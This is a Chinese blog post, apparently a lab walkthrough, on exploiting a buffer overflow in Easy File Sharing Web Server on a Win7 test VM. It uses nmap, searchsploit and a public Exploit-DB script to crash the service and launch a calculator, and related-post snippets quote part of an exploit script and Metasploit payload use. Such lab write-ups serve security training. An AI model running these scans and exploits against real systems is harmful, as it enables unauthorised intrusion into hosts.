easy file sharing server-漏洞的简单利用

最新推荐文章于 2024-01-03 06:30:44 发布
最新推荐文章于 2024-01-03 06:30:44 发布
阅读量2.2k 收藏 7
点赞数 2
文章标签: python linux 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912169/article/details/105397627
版权
easy file sharing server-漏洞的简单利用

1.win7靶机安装easy file sharing server

将efssetup_2018.zip解压安装到win7虚拟机中,然后将port改为8000然后点击restart即可,如下图在这里插入图片描述
2.使用nmap扫描主机

nmap -sV -A -o easy-file.txt 192.168.126.132

-sV 服务版本识别

-A 强力检测选项,得到更多信息

-o 将扫描结果写入文件

可以看见目标主机开启了Easy File Sharing 服务
在这里插入图片描述3.搜索可利用漏洞脚本

searchsploit Easy File Sharing Web Server

可以看见有很多可以利用的脚本,这里我们随机选择38526.py脚本,其他也是可以的
在这里插入图片描述4.利用漏洞脚本

python /usr/share/exploitdb/exploits/windows/remote/38526.py 192.168.126.132 8000

在这里插入图片描述
在这里插入图片描述
5.efssetup_2018下载地址

链接:https://pan.baidu.com/s/1iHpD4RfUKGYcWDAuvqoYZQ 
提取码:1csv

6.总结

这个主要是利用溢出漏洞攻击目标并让其服务崩溃和让主机运行计算器,主要是演练了一下渗透的过程。

hyled-Ava
关注
Easy File Sharing Web Server 缓冲区溢出漏洞
young的博客
10-22 978
Easy File Sharing Web Server 缓冲区溢出漏洞 一、首先我们需要打开虚拟机,并再windows系统上运行Easy File Sharing Web Server 二、将Easy File Sharing Web Server的端口改为8080,然后按下Restart 三、使用Nmap对目标进行扫描,确定目标主机上运行着这个软件 1.查找目标主机的ip IP查找过程: 2.在Kali Linux 2 打开一个终端,在其执行“nmap”命令 输入:nmap -sV 10.
easy file sharing server 漏洞复现
cheng___yu_的博客
12-14 3253
一、漏洞详情 Easy File Sharing FTP Server 是一款 FTP 服务程序。 Easy File Sharing FTP Server 处理 PASS 命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为 PASS 命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令 二、工具 靶机: 192.168.118.132、win10(把 windows 安全心关闭)、安装 easy file sharing s
Easy File Sharing Web Server 6.9远程溢出漏洞
weixin_30325487的博客
05-29 338
from struct import pack import socket,sys import os host="192.168.109.129" port=80 junk0 = "\x90" * 80 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 396 ppr=pack('<L',0x1...
easy file sharing server漏洞利用
m0_56368726的博客
11-07 413
1、首先在winxp靶机安装efssetup_2018.zip,并运行 2、扫描靶机进行的服务 使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。 可以看到靶机的80端口提供的服务为easy file sharing server。 3、查找漏洞渗透模块 我们可以用“searchsploit"命令在kali查找所需要的渗透模块。 我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。 ...
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 468
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用漏洞,使得靶机运行计算器。
easy flie漏洞与metasploit被控生成
qq_53099802的博客
11-22 3485
easy flie sharing server漏洞的应用 首先,将easy file sharing server放入靶机(通过文件共享放入) 打开它 配置8000端口 在kali输入 ,可观察到可用脚本,39009 searchsploit Easy File Sharing Web Server 再输入 python /usr/share/exploitdb/exploits/windows/remote/39009.py 开发靶机的ip 8000 最后观察...
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速...
Easy File Sharing Web Server 7.2.zip.7z
12-15
Easy File Sharing Web Server 7.2:文件分享与安全风险》 Easy File Sharing Web Server(简称EFSWS)是一款广泛使用的文件分享软件,它使用户能够通过网页浏览器轻松实现文件的上传和下载。该软件设计简洁,...
复现:easy file sharing server漏洞渗透测试及Metasploit应用
最新发布
m0_75239462的博客
01-03 477
(二)打开easy file sharing server,在kali终端输入nmap -sV 192.168.5.30命令进行扫描,发现靶机上的8080端口运行着“easy file sharing server”软件,版本为6.9。-o:存放payload.exe的路径,我选择的是把payload.exe下载在root文件夹里,即/root/payload.exe,也可以直接存放在桌面。(四)靶机运行payload.exe程序 ,返回kali发现在Metasploit打开了一个session。
漏洞渗透测试:easy file sharing server
m0_64005272的博客
11-05 945
扫描对应端口服务的版本信息,发现8000端口的版本信息为easy file sharing server httpd 6.9。因为靶机上有IIS可能占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart。用python运行这个脚本,运行成功。转到靶机上,发现软件自动关闭并打开了计算器,漏洞复现完毕。利用漏洞,在Kali终端输入searchsploit命令,查找渗透模块。靶机windows(这里我使用的是win7)一路next即可,点击try it!
Easy File Sharing Web Server 7.2 漏洞分析及利用
qq_36811299的博客
08-16 2694
Easy File Sharing Web Server 漏洞
kali复现easy file sharing sever漏洞利用以及metasploit的简单应用
qq_51687418的博客
12-13 3192
一、easy file sharing server漏洞渗透测试 1.首先我们要在靶机安装efssetup_2018.exe程序,并运行该程序。 2.我们打开kali利用Nmap脚本扫描局域网内存活主机,发现靶机存活(Host is up)。再对目标靶机进行nmap (靶机)ip操作发现靶机80端口打开并且运行Easy file server服务如图: kali本身有很多的漏洞利用脚本,我们在命令框输入指令查找easy file server漏洞利用脚本。 searchsploit easy file
Easy File Sharing Web Server 缓冲区溢出漏洞利用
qq_42877870的博客
04-05 2274
Easy File Sharing Web Server 缓冲区溢出漏洞利用 1.首先我们先打开一台windows7系统的虚拟机,运行efssetup_2018并安装easy file sharing server 接着我们将easy file sharing web server的端口改为8000,并按下Restart键 从easy file sharing web s...
漏洞渗透测试
inskeyzh的博客
11-13 3352
一、准备 1.Win7靶机 2.kali虚拟机 3.efssetup_2018.exe 如未安装Win7靶机,可参考以下链接: ​​​​​​​史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7 kali虚拟机安装可参考以下链接: Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程 efssetup_2018.exe下载: 链接:https://pan.baidu
复现作业A1
m0_62827634的博客
12-16 2439
1.win7靶机安装easy file sharing server 打开easy file sharing server 将port改为8000,然后点击restart。 2.在kali机上用nmap扫描主机 可以看见主机开启了easy file sharing 服务 3.搜索可利用漏洞 searchsploit Easy File Sharing Web Server 可以看见有很多可利用的脚本。我们挑选38526.py 4.利用漏洞脚本 python /usr/share/exploi..
实验--easyfilesharing
wow_iamfree的博客
10-17 1609
1.启easyfilesharing 2.查看本机ip(这里为我手机热点连接,看WLAN下的ip) 3.修改好easyfilesharing的访问地址和开发端口,并访问一下 主机上可访问,已经正常启动 4.用虚拟机扫描查看开放的的端口和对应服务 nmap -T4 -V -sV 192.168.43.246 可以看出我的主机开放了一些端口并提供了一些对应的服务,其8000端口开放了http服务,并显示了其端口上运行软件的版本(稍后会自行百度查找其他的端口开放服务) 既然开放了http服务,就从kal
AI: Web: 2靶机-Walkthrough
ins1ght的博客
09-20 2333
AI: Web: 2靶机等难度靶机。目录爆破工具啊,漏扫工具啊每次还是多用几个,血的教训……
Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析
giantbranch的专栏
07-26 2611
简介看到这个软件,之前不是GET请求缓冲区溢出吗? (附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)这次有个POST,看看有没有新鲜的东西啊!参考:https://www.exploit-db.com/exploits/42165/实验环境 WinXP sp3 文版 EFS Web Server7.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值